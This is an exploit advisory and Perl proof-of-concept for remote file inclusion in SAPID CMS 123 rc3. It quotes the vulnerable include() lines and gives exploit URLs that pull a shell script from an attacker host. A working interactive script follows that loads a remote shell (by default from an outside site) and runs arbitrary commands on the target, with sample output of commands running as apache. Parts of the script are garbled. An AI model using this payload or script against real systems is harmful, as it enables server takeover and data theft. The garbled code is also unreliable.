######################################################################### # Title: SAPID CMS remote File Inclusion Vulnerabilities # # Author: Simo64 # # Discovered: 06 Aout 2006 # # MorX Security Research Team # # http://www.morx.org # # Vendor : SAPID CMS # # Version : 123 rc3 # # Website : http://sapid.sourceforge.net # # Severity: Critical # # Details: # # # [+] Remote File Inclusion # # 1) vulnerable code in usr/extensions/get_infochannel.inc.php lines( 8 - 9 ) # # if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded"); # include($root_path."usr/system/common_extfunctions.inc.php"); } # # 2) vulnerable code in usr/extensions/get_tree.inc.php lines( 9 - 10 ) # # if(!defined("common_extfunctions")) { define("common_extfunctions", "loaded"); # include($GLOBALS["root_path"]."usr/system/common_extfunctions.inc.php"); } # # $root_path , $GLOBALS["root_path"] variable are not sanitized ,before it can be used to include files # # [-] Exploit : # # http://localhost/usr/extensions/get_infochannel.inc.php?root_path=http://attacker/cmd.txt?cmd=id;pwd # # http://localhost/usr/extensions/get_tree.inc.php?GLOBALS["root_path"]=http://attacker/cmd.txt?cmd=id;pwd # #====================================== # Poc Remote Command Execution Exploit: #====================================== # # http://www.morx.org/sapid.txt # # C:\>perl sapid.pl http://127.0.0.1 # # =============================================================== # = SAPID 123_rc3 (rootpath) Remote Command Execution Exploit = # =============================================================== # = MorX Security Research Team - www.morx.org = # = Coded by Simo64 - simo64@www.morx.org = # =============================================================== # simo64@morx.org :~$ id; pwd; ls # uid=48(apache) gid=48(apache) groups=48(apache) # get_calendar.inc.php # get_filter_list.inc.php # get_gb_records.inc.php # get_infochannelfilter.inc.php # get_infochannel.inc.php # get_rss.inc.php # get_searchresults.inc.php # get_survey.inc.php # get_track.inc.php # get_tree.inc.php # soap_call.inc.php # /home/public_html/sapid/usr/extensions # simo64@morx.org :~$ exit # # Enjoy ! # #!/usr/bin/perl use LWP::Simple; print "\n===============================================================\n"; print "= SAPID 123_rc3 (rootpath) Remote Command Execution Exploit =\n"; print "===============================================================\n"; print "= MorX Security Research Team - www.morx.org =\n"; print "= Coded by Simo64 - simo64\@www.morx.org =\n"; print "===============================================================\n\n"; my $targ,$rsh,$path,$con,$cmd,$data,$getit ; $targ = $ARGV[0]; $rsh = $ARGV[1]; if(!$ARGV[1]) {$rsh = "http://zerostag.free.fr/sh.txt";} if(!@ARGV) { &usage;exit(0);} chomp($targ); chomp($rsh); $path = $targ."/usr/extensions/get_infochannel.inc.php"; $con = get($path) || die "[-]Cannot connect to Host"; sub usage(){ print "Usage : perl $0 host/path [OPTION]\n\n"; print "Exemples : perl $0 http://127.0.0.1\n"; print " perl $0 http://127.0.0.1 http://yoursite/yourcmd.txt\n\n"; } while () { print "simo64\@morx.org :~\$ "; chomp($cmd=); if ($cmd eq "exit") { print "\nEnjoy !\n\n";exit(0);} $getit = $path."?root_path=".$rsh."?&cmd=".$cmd; $data=get($getit); if($cmd eq ""){ print "Please enter command !\n"; } else{ print $data ;} }